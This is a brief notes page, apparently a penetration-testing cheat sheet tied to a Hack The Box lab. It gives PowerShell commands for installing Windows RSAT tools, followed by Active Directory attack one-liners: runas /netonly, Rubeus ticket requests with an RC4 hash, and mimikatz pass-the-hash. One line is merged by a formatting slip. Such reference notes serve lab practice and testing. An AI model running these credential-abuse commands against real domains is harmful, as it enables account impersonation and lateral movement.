RSAT
# Check if any RSAT tools are installed
Get-WindowsCapability -Name RSAT* -Online | Select-Object -Property Name, State
# Install all available tools
Get-WindowsCapability -Name RSAT* -Online | Add-WindowsCapability –Online
# Install a specific tool
Add-WindowsCapability -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 –Onlinerunas /netonly /user:htb.local\\jackie.may powershell
rubeus.exe asktgt /user:<user> /domain:<domain> /dc:<dc-IP> /rc4:<hash>
mimikatz.exe sekurlsa::pth /domain:<domain> /user:<user> /rc4:<hash>

Last updated